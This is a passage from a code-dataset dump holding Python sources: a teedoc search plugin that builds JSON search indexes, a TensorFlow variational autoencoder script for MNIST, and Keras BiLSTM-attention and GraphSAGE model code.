string/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"36164331","text":"from genericpath import exists\nimport os, sys\nfrom os.path import join\nimport tempfile\nimport shutil\nimport markdown2\nimport json\ntry:\n curr_path = os.path.dirname(os.path.abspath(__file__))\n teedoc_project_path = os.path.abspath(os.path.join(curr_path, \"..\", \"..\", \"..\"))\n if os.path.basename(teedoc_project_path) == \"teedoc\":\n sys.path.insert(0, teedoc_project_path)\nexcept Exception:\n pass\nfrom teedoc import Plugin_Base\nfrom teedoc import Fake_Logger\n\n\n\nclass Plugin(Plugin_Base):\n name = \"teedoc-plugin-search\"\n desc = \"search support for teedoc\"\n defautl_config = {\n }\n\n def __init__(self, config, doc_src_path, site_config, logger = None):\n '''\n @config a dict object\n @logger teedoc.logger.Logger object\n '''\n self.logger = Fake_Logger() if not logger else logger\n self.doc_src_path = doc_src_path\n self.site_config = site_config\n self.config = Plugin.defautl_config\n self.config.update(config)\n self.logger.i(\"-- plugin <{}> init\".format(self.name))\n self.logger.i(\"-- plugin <{}> config: {}\".format(self.name, self.config))\n self.assets_abs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"assets\")\n self.temp_dir = os.path.join(tempfile.gettempdir(), \"teedoc_plugin_search\")\n if os.path.exists(self.temp_dir):\n shutil.rmtree(self.temp_dir)\n os.makedirs(self.temp_dir)\n\n self.css = {\n \"/static/css/search/style.css\": os.path.join(self.assets_abs_path, \"style.css\"),\n }\n self.footer_js = {\n \"/static/js/search/main.js\": os.path.join(self.assets_abs_path, \"main.js\")\n }\n self.images = {\n \"/static/image/search/close.svg\": os.path.join(self.assets_abs_path, \"close.svg\"),\n \"/static/image/search/search.svg\": os.path.join(self.assets_abs_path, \"search.svg\"),\n }\n \n # set site_root_url env value\n if not \"env\" in config:\n config['env'] = {}\n config['env'][\"site_root_url\"] = self.site_config[\"site_root_url\"]\n # replace variable in css with value\n vars = config[\"env\"]\n self.css = self._update_file_var(self.css, vars, self.temp_dir)\n self.footer_js = self._update_file_var(self.footer_js, vars, self.temp_dir)\n # files to copy\n self.html_header_items = self._generate_html_header_items()\n self.files_to_copy = {}\n self.files_to_copy.update(self.css)\n self.files_to_copy.update(self.footer_js)\n self.files_to_copy.update(self.images)\n\n self.html_js_items = self._generate_html_js_items()\n self.content = {\n \"articles\": {},\n \"pages\": {}\n }\n\n def __del__(self):\n if os.path.exists(self.temp_dir):\n try:\n shutil.rmtree(self.temp_dir)\n except Exception:\n pass\n\n def _generate_html_header_items(self):\n items = []\n # css\n for url in self.css:\n item = ''.format(url)\n items.append(item)\n return items\n\n def _generate_html_js_items(self):\n items = []\n for url in self.footer_js:\n item = ''.format(url)\n items.append(item)\n return items\n\n def _update_file_var(self, files, vars, temp_dir):\n for url, path in files.items():\n with open(path, encoding='utf-8') as f:\n content = f.read()\n for k, v in vars.items():\n content = content.replace(\"${}{}{}\".format(\"{\", k.strip(), \"}\"), v)\n temp_path = os.path.join(temp_dir, os.path.basename(path))\n with open(temp_path, \"w\", encoding='utf-8') as fw:\n fw.write(content)\n files[url] = temp_path\n return files\n \n\n def on_add_html_header_items(self):\n return self.html_header_items\n \n def on_add_html_js_items(self):\n return self.html_js_items\n \n def on_add_navbar_items(self, new_config):\n '''\n @config config cover self.config\n '''\n search_hint = \"Search\"\n search_input_hint = \"Keywords separated by space\"\n search_loading_hint = \"Loading, wait please ...\"\n search_download_err_hint = \"Download error, please check network and refresh again\"\n search_other_docs_result_hint = \"Result from other docs\"\n search_curr_doc_result_hint = \"Result from current doc\"\n if \"search_hint\" in new_config:\n search_hint = new_config[\"search_hint\"]\n elif \"search_hint\" in self.config:\n search_hint = self.config[\"search_hint\"]\n if \"input_hint\" in new_config:\n search_input_hint = new_config[\"input_hint\"]\n elif \"input_hint\" in self.config:\n search_input_hint = self.config[\"input_hint\"]\n if \"loading_hint\" in new_config:\n search_loading_hint = new_config[\"loading_hint\"]\n elif \"loading_hint\" in self.config:\n search_loading_hint = self.config[\"loading_hint\"]\n if \"download_err_hint\" in new_config:\n search_download_err_hint = new_config[\"download_err_hint\"]\n elif \"download_err_hint\" in self.config:\n search_download_err_hint = self.config[\"download_err_hint\"]\n if \"other_docs_result_hint\" in new_config:\n search_other_docs_result_hint = new_config[\"other_docs_result_hint\"]\n elif \"other_docs_result_hint\" in self.config:\n search_other_docs_result_hint = self.config[\"other_docs_result_hint\"]\n if \"curr_doc_result_hint\" in new_config:\n search_curr_doc_result_hint = new_config[\"curr_doc_result_hint\"]\n elif \"curr_doc_result_hint\" in self.config:\n search_curr_doc_result_hint = self.config[\"curr_doc_result_hint\"] \n search_btn = '''{}\n
\n {}\n {}\n {}\n {}\n {}\n
'''.format(\n search_hint, search_input_hint, search_loading_hint, search_download_err_hint, search_other_docs_result_hint, search_curr_doc_result_hint)\n items = [search_btn]\n return items\n \n def on_copy_files(self):\n return self.files_to_copy\n\n def on_htmls(self, htmls_files, htmls_pages):\n '''\n update htmls, may not all html, just partially\n htmls_files: {\n \"/get_started/zh\":{\n \"url\":{\n \"title\": \"\",\n \"desc\": \"\",\n \"keywords\": [],\n \"body\": html,\n \"url\": \"\",\n \"raw\": \"\"\n }\n }\n }\n '''\n # for file, html in htmls_files.items():\n # self.content[\"articles\"][html[\"url\"]] = html[\"raw\"]\n # for file, html in htmls_pages.items():\n # self.content[\"pages\"][html[\"url\"]] = html[\"raw\"]\n docs_url = htmls_files.keys()\n pages_url = htmls_pages.keys()\n index_content = {}\n sub_index_path = []\n generated_index_json = {}\n for i, url in enumerate(docs_url):\n index_content[url] = \"{}static/search_index/index_{}.json\".format(self.site_config[\"site_root_url\"], i)\n path = os.path.join(self.temp_dir, \"index_{}.json\".format(i))\n sub_index_path.append(path)\n # write content to sub index file\n with open(path, \"w\", encoding=\"utf-8\") as f:\n htmls_files[url][\"body\"] = \"\" # remove body, only use raw\n json.dump(htmls_files[url], f, ensure_ascii=False)\n for i, url in enumerate(pages_url, len(docs_url)):\n index_content[url] = \"{}static/search_index/index_{}.json\".format(self.site_config[\"site_root_url\"], i)\n path = os.path.join(self.temp_dir, \"index_{}.json\".format(i))\n sub_index_path.append(path)\n # write content to sub index file\n with open(path, \"w\", encoding=\"utf-8\") as f:\n htmls_pages[url][\"body\"] = \"\" # remove body, only use raw\n json.dump(htmls_pages[url], f, ensure_ascii=False)\n # write content to files\n # index file\n index_path = os.path.join(self.temp_dir, \"index.json\")\n with open(index_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(index_content, f, ensure_ascii=False)\n\n # add to copy file list\n generated_index_json[\"/static/search_index/index.json\"] = index_path\n for i, path in enumerate(sub_index_path):\n generated_index_json[\"/static/search_index/index_{}.json\".format(i)] = path\n self.files_to_copy.update(generated_index_json)\n \n\n\n\nif __name__ == \"__main__\":\n config = {\n }\n plug = Plugin(config=config)\n\n","sub_path":"plugins/teedoc-plugin-search/teedoc_plugin_search/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"635099873","text":"import tensorflow as tf \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport math\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('/tmp/data',one_hot=True);\n\ntf.set_random_seed(0);\n\n#tuning_knobs\nlearning_rate = 0.001;\nbatch_size = 128;\nn_epochs = 500; \n\n#model params\nz_dim = 32;\n\ntfd = tf.contrib.distributions #we will use this to calculate kl-divergence\n\nX = tf.placeholder(tf.float32,[None,784]);\nepoch_number = tf.placeholder(tf.float32,[]);\n\ndef get_activations(name,input_image,session):\n\tactvtns = session.run(name,feed_dict={X:input_image});\n\treturn actvtns;\n\ndef encoder_dist(X,isTrainable=True,reuse=False,name='encoder'):\n\twith tf.variable_scope(name,reuse=tf.AUTO_REUSE) as scope:\n\t\tX = tf.reshape(X,[-1,28,28,1]);\n\t\toutputs={};\n\t\tconv1 = tf.layers.conv2d(X,filters=16,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv1_layer');\n\t\tconv1 = tf.layers.batch_normalization(conv1,name='conv1_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv1 = tf.nn.max_pool(conv1,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv1_layer_maxpool');\n\t\t\n\t\toutputs['conv1'] = conv1;\n\t\t\n\t\tconv2 = tf.layers.conv2d(conv1,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv2_layer');\n\t\tconv2 = tf.layers.batch_normalization(conv2,name='conv2_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv2 = tf.nn.max_pool(conv2,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv2_layer_maxpool');\n\t\t\n\t\toutputs['conv2'] = conv2;\n\n\t\tconv3 = tf.layers.conv2d(conv2,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv3_layer');\n\t\tconv3 = tf.layers.batch_normalization(conv3,name='conv3_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv3 = tf.nn.max_pool(conv3,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv3_layer_maxpool');\n\t\t\n\t\toutputs['conv3'] = conv3;\n\t\tconv3_flt = tf.layers.flatten(conv3,name='flattened_conv3');\n\t\n\twith tf.variable_scope('VAE_mean_and_var_'+name) as scope:\n\n\t\tmean_fc = tf.layers.dense(conv3_flt,z_dim,trainable=True,reuse=False,activation=tf.nn.tanh,name='mean_fully_connected');\n\t\tvar_fc = tf.layers.dense(conv3_flt,z_dim,activation=tf.nn.softplus,trainable=True,reuse=False,name='var_fully_connected');\n\t\t\n\t\tdist = tfd.MultivariateNormalDiag(mean_fc,var_fc);\n\t\treturn dist,outputs;\n\ndef decoder(Z,isTrainable=True,reuse=False,name='decoder'):\n\twith tf.variable_scope(name) as scope:\n\t\tZ = tf.layers.dense(Z,4*4*32,activation=tf.nn.tanh,trainable=isTrainable,reuse=reuse,name='fully_connected_decoder_from_z_dim');\n\t\toutputs={};\n\t\tZ = tf.reshape(Z,[-1,4,4,32]);\n\t\t\n\t\tdeconv1 = tf.image.resize_images(Z,size=[7,7],align_corners=False);\n\t\tdeconv1 = tf.layers.conv2d_transpose(deconv1,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv1_layer');\n\t\tdeconv1 = tf.layers.batch_normalization(deconv1,name='deconv1_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\toutputs['deconv1'] = deconv1;\n\t\t\n\t\tdeconv2 = tf.image.resize_images(deconv1,size=[14,14],align_corners=False);\n\t\tdeconv2 = tf.layers.conv2d_transpose(deconv2,filters=16,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv2_layer');\n\t\tdeconv2 = tf.layers.batch_normalization(deconv2,name='deconv2_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\toutputs['deconv2'] = deconv2;\n\t\t\n\t\tdeconv3 = tf.image.resize_images(deconv2,size=[28,28],align_corners=False);\n\t\tdeconv3 = tf.layers.conv2d_transpose(deconv3,filters=1,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv3_layer');\n\t\toutputs['deconv3'] = deconv3;\n\t\tdeconv3_reshaped = tf.reshape(deconv3,[-1,784]);\n\t\treturn deconv3_reshaped,outputs;\n\nprior_dist = tfd.MultivariateNormalDiag(tf.zeros(z_dim),tf.ones(z_dim));\nposterior_dist,encoder_outputs = encoder_dist(X,isTrainable=False);\n\n## z_sample = posterior_dist.sample();\nepsilon_value = tfd.MultivariateNormalDiag(tf.zeros(z_dim),tf.ones(z_dim)).sample(tf.shape(X)[0]);\nz_sample = tf.add(posterior_dist.mean(),tf.multiply(posterior_dist.stddev(),epsilon_value));\n#z_sample = tf.placeholder(tf.float32,[None,z_dim]);\nreconstruction,decoder_outputs = decoder(z_sample);\nreconstruction_loss = tf.reduce_mean(tf.pow(X - reconstruction,2));\nKL_loss = tf.reduce_mean(tfd.kl_divergence(posterior_dist,prior_dist));\n\nkl_weight = 1.0 / (1.0 + tf.exp(-epoch_number/3+4));\n\nkl_weight *= 0.001;\nloss = kl_weight*KL_loss + reconstruction_loss;\n\n#####changes#####\n\n\n#optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss);\n\n\n## FOR TENSORBOARD ##\n\nenc_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='encoder');\nVAE_mean_and_var_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='VAE_mean_and_var_'+'encoder');\ndec_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='decoder');\n\noptimizer = tf.train.AdamOptimizer(learning_rate = learning_rate);\n\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS);\nwith tf.control_dependencies(update_ops):\n\tgradsVars = optimizer.compute_gradients(loss, tf.trainable_variables());\n\ttrain_optimizer = optimizer.apply_gradients(gradsVars);\n\ntf.summary.scalar(\"reconstruction_loss\",reconstruction_loss);\ntf.summary.scalar(\"KL_loss\",KL_loss);\n\nmerged_all = tf.summary.merge_all();\nlog_directory = 'Modified-VAE-dir';\nmodel_directory='Modified-VAE-model_dir';\n\nsave_model_directory = 'Reconstruction-VAE-model_dir';\n\nif not os.path.exists(log_directory):\n os.makedirs(log_directory);\nif not os.path.exists(model_directory):\n os.makedirs(model_directory);\n####################################\n\n\n\n#code = encoder(X);\n\ndef train_model():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer());\n\n\t\tn_batches = mnist.train.num_examples/batch_size;\n\t\tn_batches = int(n_batches);\n\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tprint('----------------PARAMS-----------------');\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\t\tprint('---------------------------------');\n\n\t\tstring = save_model_directory+'/model_'+str(98); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of encoder\"); \n\t\t sys.exit(0);\n\n\t\tprint('---------------------------------');\n\t\tprint (\"Model loaded\");\n\t\tprint('---------------------------------');\n\t\tsaver = tf.train.Saver();\n\t\t\n\t\twriter = tf.summary.FileWriter(log_directory,sess.graph);\n\t\t\n\t\ttrain_list = tf.trainable_variables();\n\n\t\tprint('----------------TRAINABLE_VARIABLES----------------');\n\t\tfor it in train_list:\n\t\t\tprint(it.name+\"\\t\");\n\n\t\tprint('---------------------------------------------------');\n\t\t\n\t\tfor epoch in range(n_epochs):\n\t\t\tepoch_loss = 0;\n\t\t\tepoch_KL_loss = 0;\n\t\t\tepoch_reconstruction_loss = 0;\n\t\t\tfor batch in range(n_batches):\n\t\t\t\tX_batch,_ = mnist.train.next_batch(batch_size);\n\t\t\t\t_,batch_cost,merged,batch_KL_loss,batch_reconstruction_loss = sess.run([train_optimizer,loss,merged_all,KL_loss,reconstruction_loss],feed_dict={X:X_batch,epoch_number:epoch});\n\t\t\t\tepoch_loss += batch_cost;\n\t\t\t\tepoch_KL_loss += batch_KL_loss;\n\t\t\t\tepoch_reconstruction_loss += batch_reconstruction_loss;\n\t\t\t\twriter.add_summary(merged,epoch*n_batches+batch);\n\t\t\tprint('At epoch #',epoch,' loss is ',epoch_loss ,' where recons loss : ',epoch_reconstruction_loss,' and KL_loss : ',epoch_KL_loss);\n\t\t\tif(epoch % 2) == 0:\n\t\t\t\tsave_path = saver.save(sess, model_directory+'/model_'+str(epoch));\n\t\t\t\tprint(\"At epoch #\",epoch,\" Model is saved at path: \",save_path);\n\t\tprint('Optimization Done !!');\n\t\tn = 5;\n\t\t\n\t\treconstructed = np.empty((28*n,28*n));\n\t\toriginal = np.empty((28*n,28*n));\n\n\t\tfor i in range(n):\n\t\t\t\n\t\t\tbatch_X,_ = mnist.test.next_batch(n);\n\t\t\trecons = sess.run(reconstruction,feed_dict={X:batch_X});\n\t\t\tprint ('recons : ',recons.shape);\n\t\t\trecons = np.reshape(recons,[-1,784]);\n\t\t\tprint ('recons : ',recons.shape);\n\n\t\t\tfor j in range(n):\n\t\t \toriginal[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = batch_X[j].reshape([28, 28]);\n\n\t\t\tfor j in range(n):\n\t\t\t\treconstructed[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = recons[j].reshape([28, 28]);\n\n\t\tprint(\"Original Images\");\n\t\tplt.figure(figsize=(n, n));\n\t\tplt.imshow(original, origin=\"upper\", cmap=\"gray\");\n\t\tplt.savefig('original_new_vae.png');\n\n\t\tprint(\"Reconstructed Images\");\n\t\tplt.figure(figsize=(n, n));\n\t\tplt.imshow(reconstructed, origin=\"upper\", cmap=\"gray\");\n\t\tplt.savefig('reconstructed_new_vae.png');\n\t\t\n\t\t\n\ndef generateSample():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='decoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\n\t\tstring = model_directory+'/model_'+str(n_epochs-2); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of decoder\"); \n\t\t sys.exit(0);\n\n\t\tprint (\"Model loaded\");\n\t\tsaver = tf.train.Saver();\n\n\t\tsample = tf.random_normal([1,z_dim]);\n\t\trecons = sess.run(reconstruction,feed_dict={z_sample:sample.eval()});\n\t\tplt.imshow(np.reshape(recons,[28,28]), interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.title('Generated Image');\n\t\tplt.savefig('gen-img.png');\n\ndef plot_conv_layers():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\n\t\tstring = model_directory+'/model_'+str(n_epochs-2); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of decoder\"); \n\t\t sys.exit(0);\n\n\t\tprint (\"Model loaded\");\n\t\tsaver = tf.train.Saver();\n\n\t\tif not os.path.exists('out'):\n\t\t\tos.makedirs('out');\n\n\t\tx_img,y_img = mnist.train.next_batch(1);\n\t\tplt.imshow(np.reshape(x_img,[28,28]), interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.title('Original Image');\n\t\tplt.savefig('out/real-img');\n\n\t\tencoder_output = sess.run(encoder_outputs,feed_dict={X:x_img});\n\t\tprint ('conv1 shape--> ',encoder_output['conv1'].shape);\n\t\tprint ('conv2 shape--> ',encoder_output['conv2'].shape);\n\n\t\t#plt.subplots_adjust(left=0.125, bottom=0.01, right=0.9, top=0.9, wspace=0.5, hspace=0.001)\n\n\t\top = encoder_output['conv1'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(1, figsize=(20,20));\n\t\tn_columns = 8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\t\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv1-op');\n\n\t\top = encoder_output['conv2'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(2, figsize=(30,30));\n\t\tn_columns = 8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv2-op');\n\n\t\top = encoder_output['conv3'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(3, figsize=(30,30));\n\t\tn_columns = 8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv3-op');\n\n\n#train_model();\ngenerateSample();\t\nplot_conv_layers();\n","sub_path":"_site/alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":11872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154701117","text":"from collections import namedtuple\r\nimport tensorflow as tf\r\nfrom aggregators import MaxPoolingAggregator\r\n\r\n\r\nclass BilstmModel(tf.keras.Model):\r\n def __init__(self, dims0, dims1,batch_size, **kwargs):\r\n\r\n super(BilstmModel, self).__init__(**kwargs)\r\n \r\n self.output_dim_bottom = 200\r\n self.output_dim_top = 200\r\n self.number_of_words = dims0\r\n self.dim_embed = dims1\r\n self.batch_size= batch_size\r\n self.masker = tf.keras.layers.Masking(mask_value = 0.,input_shape = (self.number_of_words,self.dim_embed))\r\n\r\n # Word Embedding Layer\r\n def build(self, inputs):\r\n print(self.number_of_words)\r\n self.w = tf.Variable(tf.random.uniform([1,2*self.output_dim_top]), name = \"attention\")\r\n # self.embedding =tf.keras.layers.Embedding(input_dim=self.number_of_words, output_dim=16, mask_zero=True)\r\n \r\n self.forward_layer = tf.keras.layers.LSTM(self.output_dim_bottom,dropout = 0.5, return_sequences=True,recurrent_activation = 'sigmoid', input_shape=(self.number_of_words, self.dim_embed))\r\n # self.backward_layer = tf.keras.layers.LSTM(self.output_dim_top,dropout = 0.2, return_sequences=True, go_backwards=True, input_shape = (self.number_of_words, self.dim_embed))\r\n self.bilstm = tf.keras.layers.Bidirectional(self.forward_layer, merge_mode = \"concat\")\r\n\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n w1 = tf.tile(tf.expand_dims(self.w, axis = 0), [inputs.shape[0], 1,1 ])\r\n #rajouter le batch size a la place de 100 \r\n #masque = self.embedding.compute_mask(inputs)\r\n #print(\"masque dim\", masque.shape)\r\n #print(\"inputs dim\", inputs.shape)\r\n # print(self.masker(inputs))\r\n inputs2 = self.masker(inputs)\r\n sortie1 = self.bilstm(inputs2)\r\n #print(sortie1.shape, \"sum shape\")\r\n \r\n #print(sortie1.shape)\r\n \r\n b = tf.matmul(w1,tf.transpose(sortie1,[0,2,1]))\r\n #print(\"b shape\", b.shape)\r\n alpha = tf.nn.softmax(b, axis =2)\r\n #print(\"alpha shape\", alpha.shape)\r\n sortie2 = tf.matmul(alpha, sortie1)\r\n sortie3 = tf.squeeze(sortie2, axis = 1)\r\n #print(sortie3.shape)\r\n return sortie3\r\n\r\n\r\n\r\n\r\n# SAGEInfo is a namedtuple that specifies the parameters\r\n# of the recursive GraphSAGE layers\r\nSAGEInfo = namedtuple(\"SAGEInfo\",\r\n ['layer_name', # name of the layer (to get feature embedding etc.)\r\n 'neigh_sampler', # callable neigh_sampler constructor\r\n 'num_samples',\r\n 'output_dim' # the output (i.e., hidden) dimension\r\n ])\r\n\r\nclass SampleAndAggregate(tf.keras.Model):\r\n \"\"\"\r\n Base implementation of unsupervised GraphSAGE\r\n \"\"\"\r\n\r\n def __init__(self, features, adj, degrees,\r\n layer_infos,\r\n **kwargs):\r\n '''\r\n Args:\r\n - placeholders: Stanford TensorFlow placeholder object.\r\n - features: Numpy array with node features. \r\n NOTE: Pass a None object to train in featureless mode (identity features for nodes)!\r\n - adj: Numpy array with adjacency lists (padded with random re-samples)\r\n - degrees: Numpy array with node degrees. \r\n - layer_infos: List of SAGEInfo namedtuples that describe the parameters of all \r\n the recursive layers. See SAGEInfo definition above.\r\n - concat: whether to concatenate during recursive iterations\r\n - aggregator_type: how to aggregate neighbor information\r\n - model_size: one of \"small\" and \"big\"\r\n - identity_dim: Set to positive int to use identity features (slow and cannot generalize, but better accuracy)\r\n '''\r\n super(SampleAndAggregate, self).__init__(**kwargs)\r\n\r\n self.aggregator_cls = MaxPoolingAggregator\r\n self.model_size = 512\r\n\r\n #INUTILE???????????\r\n #self.adj_info = adj\r\n\r\n\r\n\r\n '''\r\n if identity_dim > 0:\r\n self.embeds = tf.get_variable(\"node_embeddings\", [adj.get_shape().as_list()[0], identity_dim])\r\n else:\r\n self.embeds = None\r\n if features is None: \r\n if identity_dim == 0:\r\n raise Exception(\"Must have a positive value for identity feature dimension if no input features given.\")\r\n self.features = self.embeds\r\n else:\r\n self.features = tf.Variable(tf.constant(features, dtype=tf.float32), trainable=False)\r\n if not self.embeds is None:\r\n self.features = tf.concat([self.embeds, self.features], axis=1)\r\n '''\r\n\r\n self.adj = adj\r\n self.features = features\r\n self.degrees = degrees\r\n self.dims = [len(self.features[0])]\r\n self.dims.extend([layer_infos[i].output_dim for i in range(len(layer_infos))])\r\n \r\n self.batch_size = 100\r\n self.layer_infos = layer_infos\r\n #self.optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)\r\n self.aggregators = None\r\n\r\n def sample(self, inputs, layer_infos):\r\n \"\"\" Sample neighbors to be the supportive fields for multi-layer convolutions.\r\n\r\n Args:\r\n inputs: batch inputs\r\n batch_size: the number of inputs (different for batch inputs and negative samples).\r\n \"\"\"\r\n \r\n\r\n batch_size = inputs.shape[0]\r\n samples = [inputs]\r\n # size of convolution support at each layer per node\r\n support_size = 1\r\n support_sizes = [support_size]\r\n for k in range(len(layer_infos)):\r\n \r\n t = len(layer_infos) - k - 1\r\n support_size *= layer_infos[t].num_samples\r\n sampler = layer_infos[t].neigh_sampler\r\n\r\n node = sampler((samples[k], layer_infos[t].num_samples))\r\n \r\n samples.append(tf.reshape(node, [support_size * batch_size,]))\r\n support_sizes.append(support_size)\r\n return samples, support_sizes\r\n\r\n\r\n def aggregate(self, samples, input_features, dims, num_samples, support_sizes,\r\n name=None, concat=False, model_size=\"small\"):\r\n \"\"\" At each layer, aggregate hidden representations of neighbors to compute the hidden representations \r\n at next layer.\r\n Args:\r\n samples: a list of samples of variable hops away for convolving at each layer of the\r\n network. Length is the number of layers + 1. Each is a vector of node indices.\r\n input_features: the input features for each sample of various hops away.\r\n dims: a list of dimensions of the hidden representations from the input layer to the\r\n final layer. Length is the number of layers + 1.\r\n num_samples: list of number of samples for each layer.\r\n support_sizes: the number of nodes to gather information from for each layer.\r\n batch_size: the number of inputs (different for batch inputs and negative samples).\r\n Returns:\r\n The hidden representation at the final layer for all nodes in batch\r\n \"\"\"\r\n\r\n\r\n batch_size = self.batch_size\r\n\r\n # length: number of layers + 1\r\n\r\n hidden = [tf.nn.embedding_lookup(input_features, node_samples) for node_samples in samples]\r\n #hidden = features de tous les nodes qui sont à une certaine distance\r\n #en pratique on prendra input_features = [features] donc tous les titres des noeuds.\r\n new_agg = self.aggregators is None\r\n if new_agg:\r\n self.aggregators = []\r\n #len(num_samples) est le nombre de layers K\r\n \r\n for layer in range(len(num_samples)):\r\n if new_agg:\r\n dim_mult = 2 if (layer!=0) else 1\r\n # aggregator at current layer\r\n if layer == len(num_samples) - 1:\r\n #si on est à la fin, l'activation est l'identité\r\n aggregator = self.aggregator_cls(dim_mult*dims[layer], dims[layer+1], act=lambda x : x,\r\n dropout=0.2)\r\n else:\r\n #sinon l'activation est le relu (de base)\r\n aggregator = self.aggregator_cls(dim_mult*dims[layer], dims[layer+1], act = tf.keras.activations.relu,\r\n dropout=0.2)\r\n self.aggregators.append(aggregator)\r\n else:\r\n aggregator = self.aggregators[layer]\r\n # hidden representation at current layer for all support nodes that are various hops away\r\n next_hidden = []\r\n # as layer increases, the number of support nodes needed decreases\r\n for hop in range(len(num_samples) - layer):\r\n dim_mult = 2 if (layer!=0) else 1\r\n neigh_dims = [batch_size * support_sizes[hop], \r\n num_samples[len(num_samples) - hop - 1], \r\n dim_mult*dims[layer]]\r\n\r\n h = aggregator((hidden[hop],tf.reshape(hidden[hop + 1], neigh_dims)))\r\n next_hidden.append(h)\r\n hidden = next_hidden\r\n\r\n\r\n return hidden[0]\r\n #on prend 0 car on s'intéresse juste aux embeddings des noeuds de base\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n\r\n \r\n inputs1 = inputs[\"batch1\"]\r\n self.batch_size = inputs1.shape[0]\r\n #inputs1: noeud 1\r\n inputs2 = inputs[\"batch2\"]\r\n\r\n #inputs2: noeud 2\r\n \r\n # perform \"convolution\"\r\n samples1, support_sizes1 = self.sample(inputs1, self.layer_infos)\r\n\r\n samples2, support_sizes2 = self.sample(inputs2, self.layer_infos)\r\n\r\n num_samples = [layer_info.num_samples for layer_info in self.layer_infos]\r\n outputs1 = self.aggregate(samples1, [self.features], self.dims, num_samples, support_sizes1)\r\n outputs2 = self.aggregate(samples2, [self.features], self.dims, 